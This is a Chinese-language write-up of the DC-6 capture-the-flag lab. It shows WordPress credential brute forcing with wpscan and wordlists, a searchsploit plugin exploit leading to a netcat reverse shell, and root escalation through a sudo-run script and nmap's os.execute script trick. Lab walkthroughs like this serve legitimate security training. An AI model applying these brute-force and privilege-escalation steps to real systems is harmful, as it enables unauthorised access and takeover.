DC-6靶场
创始人
2024-05-29 18:26:46
0

文章目录

  • 下载地址
  • 信息搜集
  • 密码爆破
  • 反弹shell
  • 提权
  • 得到flag

下载地址

DC-6下载地址

信息搜集

image-20230306175956038

获取地址,发现地址为192.168.28.138,然后直接nmap全扫描。

image-20230306180045571

首先,发现了

http-title: Did not follow redirect to http://wordy/  

地址被指向了wordy ,所以需要去修改一下hosts的配置。

vim /etc/hosts
192.168.28.138 wordy

image-20230306180405516

其次,明显的看出来该靶场大概的系统及版本,直接用dir扫。

image-20230306180752558

在/wp-login.php发现登录框,跟之前那个一样,直接爆破账号密码。

密码爆破

首先用wpscan爆破出密码。

image-20230306181241370

扫出来5个,存入user.txt文件。

然后用cewl去爬密码。

cewl http://wordy -w passwd.txt

直接用wpscan爆破。

wpscan --url http://wordy -U user.txt -P passwd.txt

但是没爆破出来,去换一下自带吗密码库,继续尝试。

gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwd.txt
wpscan --url wordy -U user.txt -P passwd.txt

没跑破完就出来一个。

image-20230306182318085

直接登录,发现了版本信息,在后台发现了插件。

image-20230306183633836

反弹shell

在网上搜索后发现此插件存在漏洞,searchsploit搜一下。

image-20230306184151224

然后下载下来,修改

image-20230306215907652

然后在本地起一个http服务。(这里以python3演示)

python -m http.server 80

image-20230306215314576

然后本地访问即可。

image-20230306215424857

先本地开启nc接收,然后点击一下即可。

提权

先进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

find里没有找到flag,但是在mark目录里得到了things-to-do.txt文件。

Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得密码后直接ssh远程登录。

ssh graham@192.168.28.138

image-20230306223008867

查看可执行命令,发现了以jens身份执行的文件。

image-20230306223511726

看一下,在结尾加上/bin/sh。(需要在/home/jens目录下)

然后以jens的身份去执行命令,身份会切换到jens。

sudo -u jens ./backups.sh

image-20230306224116075

继续查看可执行命令。

image-20230306224433731

然后发现了nmap,利用其提权。(这种操作第一次见)

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

得到flag

进入root模式后直接cd进入root目录然后即可看到theflag.txt。

image-20230306225815889

相关内容

热门资讯

保存时出现了1个错误,导致这篇... 当保存文章时出现错误时,可以通过以下步骤解决问题:查看错误信息:查看错误提示信息可以帮助我们了解具体...
汇川伺服电机位置控制模式参数配... 1. 基本控制参数设置 1)设置位置控制模式   2)绝对值位置线性模...
不能访问光猫的的管理页面 光猫是现代家庭宽带网络的重要组成部分,它可以提供高速稳定的网络连接。但是,有时候我们会遇到不能访问光...
表格中数据未显示 当表格中的数据未显示时,可能是由于以下几个原因导致的:HTML代码问题:检查表格的HTML代码是否正...
本地主机上的图像未显示 问题描述:在本地主机上显示图像时,图像未能正常显示。解决方法:以下是一些可能的解决方法,具体取决于问...
表格列调整大小出现问题 问题描述:表格列调整大小出现问题,无法正常调整列宽。解决方法:检查表格的布局方式是否正确。确保表格使...
不一致的条件格式 要解决不一致的条件格式问题,可以按照以下步骤进行:确定条件格式的规则:首先,需要明确条件格式的规则是...
Android|无法访问或保存... 这个问题可能是由于权限设置不正确导致的。您需要在应用程序清单文件中添加以下代码来请求适当的权限:此外...
【NI Multisim 14...   目录 序言 一、工具栏 🍊1.“标准”工具栏 🍊 2.视图工具...
银河麒麟V10SP1高级服务器... 银河麒麟高级服务器操作系统简介: 银河麒麟高级服务器操作系统V10是针对企业级关键业务...